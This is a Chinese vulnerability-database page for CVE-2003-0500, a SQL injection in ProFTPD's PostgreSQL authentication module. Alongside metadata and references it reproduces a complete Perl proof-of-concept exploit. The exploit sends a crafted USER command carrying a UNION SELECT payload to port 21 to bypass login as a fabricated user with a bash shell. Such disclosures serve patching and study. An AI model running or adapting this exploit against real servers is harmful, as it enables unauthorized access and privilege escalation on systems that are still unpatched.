ProFTPD PostgreSQL认证模块SQL注入漏洞

ProFTPD PostgreSQL认证模块SQL注入漏洞

漏洞ID 1107387 漏洞类型 SQL注入
发布时间 2003-06-19 更新时间 2003-08-07
图片[1]-ProFTPD PostgreSQL认证模块SQL注入漏洞-安全小百科CVE编号 CVE-2003-0500
图片[2]-ProFTPD PostgreSQL认证模块SQL注入漏洞-安全小百科CNNVD-ID CNNVD-200308-006
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/43
https://www.securityfocus.com/bid/82756
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-006
|漏洞详情
ProFTPD1.2.9rc1之前版本的PostgreSQL认证模块存在SQL注入漏洞。远程攻击者借助USER名绕过认证或者盗取密码来执行任意SQL且提升特权。
|漏洞EXP
#!/usr/bin/perl
# ProFTPD 1.2.9 rc1 mod_sql SQL Injection remote Exploit
# Spaine - 2003

use IO::Socket;
if(@ARGC<2){
    print "nProof Of Concept Sql Inject on ProFTPDn";
    print "Usage: perl poc-sqlftp <target> [1=Alternate query]nn";
    exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = 
IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) 
                          or die "Can't connect. n";
if(defined($line=<$remote>)){
    print STDOUT $line;
}

# Proof of concept query, it may change on the number of rows
# By default, it can query User, Pass, Uid, Gid, Shell or
# User, Pass, Uid, Gid, Shell, Path, change the union query...

if($query eq "1"){
    print $remote "USER ')UNION 
SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='n";
}else{
    print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' 
WHERE(''='n";
};
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print $remote "PASS pn";
if(defined($line=<$remote>)){
    print STDOUT $line;
}
print "Sent query to $ARGV[0]n";
if($line =~ /230/){  #logged in
    print "[------- Sql Inject Able n";
}else{
    print "[------- Sql Inject Unable n";
}
close $remote;

# milw0rm.com [2003-06-19]
|受影响的产品
ProFTPD Project ProFTPD 1.2.9 rc1
|参考资料

来源:DEBIAN
名称:DSA-338
链接:http://www.debian.org/security/2003/dsa-338
来源:FULLDISC
名称:20030618SQLInjectinProFTPDloginagainstPostgresqlusingmod_sql
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005826.html

相关推荐: Caldera rsync Vulnerability

Caldera rsync Vulnerability 漏洞ID 1104769 漏洞类型 Unknown 发布时间 1999-05-04 更新时间 1999-05-04 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVSS评分 N/A |…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享